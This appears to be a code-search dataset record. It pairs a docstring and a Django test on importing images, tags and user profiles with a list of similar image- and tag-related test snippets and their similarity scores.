apps.get_model('taggit', 'TaggedItem')\n\n images = Image.objects.all()\n new_images = []\n for image in images:\n new_images.append(FieldImage(\n id=image.id,\n title=image.title,\n file=image.file,\n width=image.width,\n height=image.height,\n created_at=image.created_at,\n focal_point_x=image.focal_point_x,\n focal_point_y=image.focal_point_y,\n focal_point_width=image.focal_point_width,\n focal_point_height=image.focal_point_height,\n file_size=image.file_size,\n collection=image.collection,\n uploaded_by_user=image.uploaded_by_user,\n alt_text=''\n ))\n\n FieldImage.objects.bulk_create(new_images)\n\n ct_extended_model, created = django_content_type.objects.get_or_create(\n app_label='field_wagtail',\n model='fieldimage'\n )\n ct_wagtail_model = django_content_type.objects.get(\n app_label='wagtailimages',\n model='image'\n )\n\n tagged_item_model.objects.filter(\n content_type_id=ct_wagtail_model.id).update(\n content_type_id=ct_extended_model.id\n )", "def setUp(self):\n\n self.user_1 = User.objects.create_user(\n username='testuser', password='12345',\n email='[email protected]'\n )\n\n # self.profile_1 = Profile.objects.create(user=self.user_1,\n # image='profile_default.jpg')", "def test_upload_image(self):\n image = self.mock_master.get_imagelist(self.region1)[0]\n id = self.mock_master.upload_image(self.region2, image)\n found = False\n for i in self.mock_master.get_imagelist(self.region2):\n if i.id == id:\n self.assertEquals(i.region, self.region2.region)\n self.assertEquals(i.name, image.name)\n self.assertEquals(i.checksum, image.checksum)\n found = True\n break\n self.assertTrue(found)", "def test_signup_photo(self, mocked_sendy):\n url = '/0/chefs'\n data = {\n 'email': '[email protected]',\n 'password': 'secret',\n 'name': 'John',\n 'surname': 'Doe',\n 'language': 'es',\n 'photo': IMAGES['png'],\n }\n resp = self.client.post(url, data=data)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('auth', resp.data)\n self.assertIn('token', resp.data['auth'])\n # Check that the photo exists\n self.assertTrue(Chefs.objects.last().avatar_photos.all())", "def test_delete_image_by_wrong_tag(self, test_image):\n tag = f\"{TEST_IMAGE_NAME}:wrong_tag\"\n assert image_exists(TEST_IMAGE_NAME)\n assert not delete_image(tag, force=True)\n assert image_exists(TEST_IMAGE_NAME)\n\n # now delete using that tag, both tags will be gone because it's the same image.\n build_test_image(tag=tag)\n assert image_exists(TEST_IMAGE_NAME)\n assert image_exists(tag)\n assert delete_image(tag, force=True)\n assert not image_exists(TEST_IMAGE_NAME)\n assert not image_exists(tag)", "def test_image_obj_creado_con_exito(self):\n self.assertTrue(self.image_model.objects.get(pk=self.image_obj.pk))", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_comment_child = self.make_comment_data('test_child_comment', self.comment_id, children=[])\n cs_comment = self.make_comment_data(self.comment_id, None, [cs_comment_child])\n cs_thread = make_minimal_cs_thread({\n 'id': self.thread_id,\n 'course_id': str(self.course.id),\n 'children': [cs_comment],\n })\n self.register_get_thread_response(cs_thread)\n self.register_get_comment_response(cs_comment)\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {'requested_fields': 'profile_image'})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_get_photos_paging(self):\n pass", "def test_add_remove_two(self):\n record = self.good_record()\n # Create a fake record in mongo\n id1 = self.images.insert(record.copy())\n record['id'] = 'fakeid2'\n record['tag'] = []\n id2 = self.images.insert(record.copy())\n\n status = self.m.add_tag(id2, self.system, self.tag)\n self.assertTrue(status)\n rec1 = self.images.find_one({'_id': id1})\n rec2 = self.images.find_one({'_id': id2})\n self.assertNotIn(self.tag, rec1['tag'])\n self.assertIn(self.tag, rec2['tag'])", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_thread = make_minimal_cs_thread({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"username\": self.user.username,\n \"user_id\": str(self.user.id),\n })\n self.register_get_thread_response(cs_thread)\n self.create_profile_image(self.user, get_profile_image_storage())\n response = self.client.get(self.url, {\"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n expected_profile_data = self.get_expected_user_profile(self.user.username)\n response_users = json.loads(response.content.decode('utf-8'))['users']\n assert expected_profile_data == response_users[self.user.username]", "def addImageSuggestion(self, item, metadata):\n claims = item.get().get('claims')\n\n if not metadata.get(u'imageurl'):\n # Nothing to add\n return\n if u'P4765' in claims:\n # Already has a suggestion\n return\n\n if u'P18' in claims:\n newimage = requests.get(metadata.get(u'imageurl'), stream=True)\n if not newimage.headers.get('Content-length'):\n return\n if not newimage.headers.get('Content-length').isnumeric():\n return\n newimagesize = int(newimage.headers['Content-length'])\n #print (u'Size of the new image is %s according to the headers' % (newimagesize,))\n if newimagesize < 500000:\n # Smaller than 500KB is just too small to bother check to replace\n return\n\n for imageclaim in claims.get(u'P18'):\n currentsize = imageclaim.getTarget().latest_file_info.size\n #print (u'Size of the current image is %s' % (currentsize,))\n # New image should at least be 4 times larger\n if currentsize * 4 > newimagesize:\n return\n\n newclaim = pywikibot.Claim(self.repo, u'P4765')\n newclaim.setTarget(metadata[u'imageurl'])\n pywikibot.output('Adding commons compatible image available at URL claim to %s' % item)\n item.addClaim(newclaim)\n\n if metadata.get(u'imageurlformat'):\n newqualifier = pywikibot.Claim(self.repo, u'P2701')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurlformat')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n newqualifier = pywikibot.Claim(self.repo, u'P2699')\n newqualifier.setTarget(metadata[u'describedbyurl'])\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('title'):\n if metadata.get('title').get(u'en'):\n title = pywikibot.WbMonolingualText(metadata.get('title').get(u'en'), u'en')\n else:\n lang = list(metadata.get('title').keys())[0]\n title = pywikibot.WbMonolingualText(metadata.get('title').get(lang), lang)\n newqualifier = pywikibot.Claim(self.repo, u'P1476')\n newqualifier.setTarget(title)\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('creatorname'):\n newqualifier = pywikibot.Claim(self.repo, u'P2093')\n newqualifier.setTarget(metadata.get('creatorname'))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get(u'imageurllicense'):\n newqualifier = pywikibot.Claim(self.repo, u'P275')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurllicense')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(self.user)\n tag2 = sample_tag(self.user, name='Fatty food')\n payload = {\n 'title': 'Cheescake',\n 'time_minutes': 49,\n 'price': 30,\n 'tags': [tag1.id, tag2.id]\n }\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n self.assertEqual(tags.count(), 2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2, tags)\n # Remove probably\n serializer = RecipeDetailSerializer(recipe)\n res = self.client.get(detail_url(recipe.id))\n self.assertEqual(res.data, serializer.data)", "def test_create_recipe_with_tag(self):\n tag1 = sample_tag(user=self.user, name = 'Vegen')\n tag2 = sample_tag(user=self.user, name='Dessert')\n\n payload = {\n 'title': 'Avocado lime cheescake',\n 'tags' : [tag1.id, tag2.id],\n 'time_minuts': 50,\n 'price': 400\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n self.assertEqual(tags.count(),2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2,tags)", "def test_activity_photos(self):\n activity = self.client.get_activity(152668627)\n self.assertTrue(activity.photo_count > 0)\n photos = list(activity.photos)\n self.assertEqual(len(photos), 1)\n self.assertEqual(len(photos), activity.photo_count)\n self.assertIsInstance(photos[0], model.ActivityPhoto)", "def test_single_image_with_special_tag(self, client, tag):\n train_id = gbl.get_train_ids()[0]\n params = dict(train_id=train_id, tag=tag, step=1)\n url = get_url(BASE_URL, params)\n\n response = client.get(url)\n assert response.status_code == 400\n\n response = response.get_json()\n assert response['error_code'] == '5054500D'\n assert response['error_msg'] == \"Image is not exist. Detail: Invalid parameter value. \" \\\n \"Can not find any data in this train job by given tag.\"", "def test_Image():\n assert Image(cur, \"Simple_Linear\").detect_image() == True\n assert Image(cur, \"Logistic_Linear\").detect_image() == False\n assert Image(cur, \"Simple_Linear\").date == \"2021-04-20\"\n assert Image(cur, \"Breslow-Day_Test\").source == \"Course BIOSTAT703 slide\"", "def test_create_thumbnails(self):\n \n logging.info('create_thumbnail')\n \n for size in self.article.sizes.keys():\n assert not self.article.thumbnail_exists(size)\n\n self.article.image.save('avatar.png', ContentFile(self.image.read()))\n self.article.create_thumbnails()\n \n for size in self.article.sizes.keys():\n assert self.article.thumbnail_exists(size)", "def test_answer_meta_image_uses_category_image_if_no_social_image(self):\n category = baker.make(Category, category_image=self.test_image)\n page = self.page1\n page.category.add(category)\n page.save_revision()\n self.assertEqual(page.meta_image, self.test_image)", "def test_get_image_id(self):\n img_id = str(uuid.uuid4())\n img_name = 'myfakeimage'\n self.my_image.id = img_id\n self.my_image.name = img_name\n self.sahara_client.images.get.return_value = self.my_image\n self.sahara_client.images.find.side_effect = [[self.my_image], []]\n\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_id))\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_name))\n self.assertRaises(exception.EntityNotFound,\n self.sahara_plugin.get_image_id, 'noimage')\n\n calls = [mock.call(name=img_name),\n mock.call(name='noimage')]\n self.sahara_client.images.get.assert_called_once_with(img_id)\n self.sahara_client.images.find.assert_has_calls(calls)", "def add_tag_image_data(video_id, info, image_analysis_id):\n\n tags = info['tags'] # tags is a dictionary\n for tag_to_add in tags:\n tag_id = Tag.query.filter(Tag.tag == tag_to_add).first().tag_id\n if not TagImage.query.filter(TagImage.tag_id == tag_id,\n TagImage.image_analysis_id == image_analysis_id).first():\n tag_image = TagImage(tag_id=tag_id, \n image_analysis_id=image_analysis_id)\n db.session.add(tag_image)\n\n try:\n db.session.commit()\n except (Exception, exc.SQLAlchemyError, exc.InvalidRequestError, exc.IntegrityError) as e:\n print(hex_code + '\\n' + str(e))", "def testimage_handler(self):\n\t\t\n\t\tthings = Thing.objects.all()\n\t\tif len( things ):\n\t\t\tthing = things[0]\n\t\telse:\n\t\t\tc = Client()\n\t\t\tdata = parse_qs( 'title=&tags=&lattitude=32.82248&longitude=-96.762986&duration=&parent=&privacy=U&lifespan=&format=txt' )\n\t\t\tdata[ 'media' ] = open( MEDIA_ROOT + 'unittest_image.jpg' )\n\t\t\tc.post( '/api/place/', data )\n\t\t\t\n\t\t\tthing = Thing.objects.all()[0]\n\n\t\t\n\t\turi = thing.media.replace( 'http://' + DOMAIN, '' )\n\t\t\n\t\tc = Client()\n\t\tresponse = c.get( uri )\n\t\tself.failUnlessEqual(response.status_code, 200)", "def test_deletion_of_user_photo_succeeds(self):\n\t\tself.name = 'media.png'\n\t\tself.image = File(open('static/img/media.png', 'rb'))\n\t\tself.created_image = UserPhoto(image=self.image, name=self.name, created_by=self.user)\n\t\tself.created_image.save()\t\t\t\n\t\tresponse = self.client.delete('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)", "def test_profile_made(self):\n self.assertTrue(ImagerProfile.objects.count() == 5)", "def simple_test(self, img, img_meta, **kwargs):\n pass" ]
[ "0.6760434", "0.6466026", "0.6373129", "0.620715", "0.61913586", "0.61831266", "0.6162001", "0.61448395", "0.61397374", "0.61137104", "0.6010534", "0.60070205", "0.59996825", "0.5987241", "0.59855795", "0.59617376", "0.5952365", "0.5951813", "0.594541", "0.5944202", "0.594388", "0.5938778", "0.5908311", "0.58899283", "0.5887875", "0.58775014", "0.5873002", "0.5817553", "0.581176", "0.5800704", "0.5797769", "0.5793435", "0.5788559", "0.5777796", "0.5743501", "0.57356584", "0.57355756", "0.5718911", "0.57132906", "0.5711784", "0.5698263", "0.5697285", "0.5688512", "0.56779605", "0.56712765", "0.5667953", "0.564997", "0.5641534", "0.563462", "0.5631831", "0.5629539", "0.5616728", "0.5615126", "0.5610671", "0.56048", "0.5596394", "0.55918837", "0.5587666", "0.55775875", "0.5574589", "0.5573034", "0.5570159", "0.5564582", "0.55635875", "0.5555989", "0.5555821", "0.5544566", "0.5541567", "0.55396336", "0.5536949", "0.5536486", "0.5530501", "0.55072975", "0.55066246", "0.549478", "0.5484947", "0.5478954", "0.54772854", "0.54712355", "0.54708385", "0.546385", "0.5459219", "0.5447773", "0.544612", "0.54331833", "0.5416847", "0.5415203", "0.5414359", "0.54118705", "0.540894", "0.5404497", "0.540186", "0.5401767", "0.5391652", "0.5379118", "0.53784966", "0.53718764", "0.53657657", "0.53592235", "0.5348482" ]
0.57373446
35
Image (m)(m)> Tag > UserProfile > User e.g. see factory.create_tags_images for the creation of the below items > We'll assert that populating related data on the m2m field > constructs the expect > retrieves the correct results > doesn't retrieve the incrorrect results Image.pk Image.name Tag.name company user i grass green x y i grass blue x y k sun yellow x y l grass green q l m sun green q l
def test_m2m_dependent_object_import_precision(self): #: TODO: Come up with a better name other_company = Company.objects.create(name='Other Co', natural_id='oc') _,other_user_profile = create_base_models(username='other', company=other_company) #: Create same named tags <-- assert later that they do not get filtered out as they are from a different #: company blue = Tag.objects.create( company=other_company, created_by=other_user_profile, name='blue', slug='blue', rank=0 ) green = Tag.objects.create( company=other_company, created_by=other_user_profile, name='green', slug='green', rank=2 ) user_profile: UserProfile = self.user_profiles[0] # See self.setUp() # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************ # Initialize Importers image_manager = ImporterManager(importer=ImageImporter()) tag_manager = ImporterManager(importer=TagImporter()) up_manager = ImporterManager(importer=UserProfileImporter()) company_manger = ImporterManager(importer=CompanyImporter()) user_manager = ImporterManager(importer=UserImporter()) # Populate leaf models of dependency tree with kv data for row,image in enumerate(self.images): user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row) company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row) #: Retrieve data associated with kv data user_manager.get_available_rows() company_manger.get_available_rows() #: Populate data up the dependency tree with retrieved rows for row,image in enumerate(self.images): up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row) up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row) #: Retrieve data associated with models depended upon up_manager.get_available_rows() tag_manager.update_kvs('slug', 'blue', row=0, col=0) tag_manager.update_kvs('slug', 'green', row=0, col=1) #: Anyway to avoid pushing these redundant kvs accross a row (??) tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0) # tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=1) tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0) # tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=1) tag_manager.update_kvs('slug', 'yellow', row=1, col=0) tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0) tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0) #: Retrieve associate intermediate data tag_manager.get_available_rows() self.assertEqual(len(tag_manager.get_object_or_list(0)), 2) for tag in tag_manager.get_object_or_list(0): self.assertEqual(tag.company_id, self.company.id) self.assertNotEqual(tag.company_id, other_company.id) self.assertIsInstance(tag_manager.get_object_or_list(1), Tag)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_image(self):\n\n image = Image.query.filter(Image.tag1 == \"Denali\").first()\n self.assertEqual(image.tag1, \"Denali\")", "def test_users_photos_view_set_get_own_photos(self):\n # Create user and data\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_aov_web_user_view_get_successful(self):\n # Create test data\n # weight of 1\n user = account_models.User.objects.create_user(age=25, email='[email protected]', first_name='Martin',\n last_name='Ronquillo', location='Boise',\n social_name='@ronquilloaeon', password='pass',\n username='aov_hov')\n # weight of 6\n other_user = account_models.User.objects.create_user(email=\"[email protected]\", password=\"test\", username=\"testy\")\n category = PhotoClassification.objects.create_or_update(name='Test', classification_type='category')\n\n\n photo1 = Photo(image=Image(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n PhotoComment.objects.create_or_update(photo=photo1, comment=\"Nice one!\", user=other_user)\n\n photo2 = Photo(image=Image(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=other_user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n request = APIClient().get('/api/aov-web/users/top', format='json')\n results = request.data[\"results\"]\n\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0][\"id\"], other_user.id)\n self.assertEqual(results[1][\"id\"], user.id)", "def test_album_image_user(self):\n self.assertEqual(self.album.user, self.photo.user)", "def test_ingredients_by_id_image(self):\n pass", "def test_images(self):\n\n message = {\"method\": \"images\", \"params\": {\"elem\": None}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"images\")\n self.assertIsInstance(response[\"result\"], list)\n\n images = [i[\"tag\"] for i in response[\"result\"]]\n\n self.assertIn(self.tag_image, images)", "def test_get_owner_image(self):\n\n # user1 is owner of image_id 1\n # user2 is owner of image ids (2,3)\n for image_id in range(1, 4):\n url = reverse(self.url_name_one, args=(image_id,))\n if image_id == 1:\n self.client.force_authenticate(self.user1)\n else:\n self.client.force_authenticate(self.user2)\n\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n if image_id == 1:\n self.assertEqual(response.data[\"owner\"], \"user1\")\n else:\n self.assertEqual(response.data[\"owner\"], \"user2\")\n\n # user2 try to get image_id 1 which is owner user1\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_users_photos_view_set_get_successful(self):\n # Create user and data\n access_user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='m')\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(access_user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_list_image_metadata(self):\n pass", "def test_add_to_bag(self):\n user = User.objects.create(username='test')\n image = Image.objects.create(\n img_title='test', base_price=0, user_id=user)\n bag = {image.id: 1}\n response = self.client.post('/images/', bag)\n self.assertEqual(response.status_code, 200)", "def test_retrieval_of_user_photos(self):\t\n\t\tget_response = self.client.get(reverse('photos'))\n\n\t\tself.assertEqual(get_response.status_code, status.HTTP_200_OK)\n\t\tdata = [i.values() for i in get_response.data]\n\t\tself.assertIn(u'{}'.format(self.image_name), data[0])", "def test_profile_image_requested_field(self):\n user_2 = UserFactory.create(password=self.password)\n # Ensure that parental controls don't apply to this user\n user_2.profile.year_of_birth = 1970\n user_2.profile.save()\n source_threads = [\n self.create_source_thread(),\n self.create_source_thread({\"user_id\": str(user_2.id), \"username\": user_2.username}),\n ]\n\n self.register_get_user_response(self.user, upvoted_ids=[\"test_thread\"])\n self.register_get_threads_response(source_threads, page=1, num_pages=1)\n self.create_profile_image(self.user, get_profile_image_storage())\n self.create_profile_image(user_2, get_profile_image_storage())\n\n response = self.client.get(\n self.url,\n {\"course_id\": str(self.course.id), \"requested_fields\": \"profile_image\"},\n )\n assert response.status_code == 200\n response_threads = json.loads(response.content.decode('utf-8'))['results']\n\n for response_thread in response_threads:\n expected_profile_data = self.get_expected_user_profile(response_thread['author'])\n response_users = response_thread['users']\n assert expected_profile_data == response_users[response_thread['author']]", "def test_list_image(self):\n pass", "def images_init(self):\n\n self.user_image = UserImage(\n user_id=self.user_id,\n tag=self.tag_image,\n image_id='sha256:342fea22',\n created=1524229897,\n size=191623983\n )\n self.user_image.save()\n\n CLIENT.images_list.append(\n {'Containers': -1,\n 'Created': 1524229897,\n 'Id': 'sha256:342fea22',\n 'Labels': None,\n 'ParentId': 'sha256:55d98c2',\n 'RepoDigests': None,\n 'RepoTags': [self.tag_image],\n 'SharedSize': -1,\n 'Size': 191623983,\n 'VirtualSize': 191623983}\n )", "def setUp(self):\n # slugify_unique should return 'foo\n # so image names would be just 'foo.jpg'\n with mock.patch.object(\n models,\n 'slugify_unique',\n return_value='foo'\n ):\n # create an image attached to the content object\n self.image = models.Image.objects.create(\n image=get_image_in_memory_data(),\n position=0,\n content_type=ContentType.objects.get_for_model(TestModel),\n object_id=self.object.id\n )\n # load created image from the database\n # it's necessary because the Image.image value differs\n # in loaded images (the field adds the path while saving)\n # created image: foo.jpg\n # loaded image: gallery/foo.jpg\n self.image = self.get_image()", "def test_user_photo_retrieval_by_id_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_tag_image_duplicate(self):\n\n message = {\n \"method\": \"build_image\",\n \"params\": {\"url\": self.url,\n \"tag_image\": self.tag_image}\n }\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"error\")", "def multi_tag_image(self, owner_userid, tag_userid, image_ids, tag_names):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_username = validation.cast_integer(tag_userid, 'userid')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\n\t\tself.log.debug(\"about to tag %d images with %d tags\" % (len(image_ids), len(tag_names)))\n\t\tfor id in image_ids:\n\t\t\ttry:\n\t\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\t\texcept errors.ValidationError, ex:\n\t\t\t\treturn utils.return_deferred_error(ex.value)\n\t\t\tself.log.debug(\"image %s\" % id)\n\n\t\t# do all inserts in a single transaction\n\t\tdef tag_txn(txn, owner, tagger, ids, tags):\n\t\t\tfor id in ids:\n\t\t\t\tid = validation.cast_integer(id, 'id')\n\t\t\t\tfor tag in tags:\n\t\t\t\t\ttag = tag.lower()\n\t\t\t\t\ttxn.execute(\"\"\"\n\t\t\t\t\t\tselect zoto_insert_user_image_tag(\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s\n\t\t\t\t\t\t)\n\t\t\t\t\t\"\"\", (owner, id, tag, tagger))\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_ids, tag_names)", "def test_get_chef_with_photo(self):\n url = '/0/chefs/' + str(self.user.pk)\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertNotIn('photo', resp.data['chef'])\n\n self.user.avatar_photos.create(s3_url='image') # Create photo\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertIn('photo', resp.data['chef'])\n keys = set(('id', 'url', 'creation_date', 'edit_date'))\n self.assertEqual(keys, set(resp.data['chef']['photo']))", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def setUp(self):\n self.new_image = Images(image=\"image.jpg\", image_name=\"roses\", caption=\"live\",\n user_id=1, user='Joy', likes=0, posted_on=\"111-2019\")", "def test_equipment_by_id_image(self):\n pass", "def setUp(self):\n self.new_user = User(\n username=\"Hey\", email=\"[email protected]\", password=\"heyjfbghjdnf\")\n self.new_user.save()\n self.new_image = Image(name='Hey', user=self.new_user)\n self.new_image.save()", "def create_image(user_id, image_name, tag1, tag2, tag3):\n\n image = Image(user_id=user_id, image_name=image_name, tag1=tag1, tag2=tag2, tag3=tag3)\n\n db.session.add(image)\n db.session.commit()\n\n return image", "def testImageHandling(self):\n \n pm = getToolByName(self.portal, 'portal_membership')\n #make sure the person's member portrait isn't defined\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n # Delete the (nonexistant) image, make sure the portrait stays undefined\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n self.person.setImage(TEST_GIF, content_type=\"image/gif\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_GIF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n self.failUnlessEqual(pm.getPersonalPortrait('abc123').__name__, 'abc123')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnlessEqual(scaledImageTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />')\n \n # Delete the image, make sure the portrait is deleted as well\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n #self.person.setImage(TEST_JPEG, content_type=\"image/jpeg\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_JPEG)\n \n self.person.setImage(TEST_TIFF, content_type=\"image/tiff\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_TIFF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n # TIFF handling in Plone is broken (probably the fault of PIL), handle the problem nicely.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnless(scaledImageTag == '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />' or scaledImageTag == '')", "def test_photos_limited_to_user(self, api_client, test_user):\n\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'password123'\n )\n sample_photo(user=user2)\n sample_photo(user=test_user)\n\n api_client.force_authenticate(test_user)\n res = api_client.get(PHOTO_URL)\n\n photos = Photo.objects.filter(user=test_user)\n serializer = PhotoSerializer(photos, many=True)\n\n assert res.status_code == status.HTTP_200_OK\n assert len(res.data) == 1\n assert res.data == serializer.data", "def test_user_photo_retrieval_by_name_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/image/?name={}'.format(self.created_image.name))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\t\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def 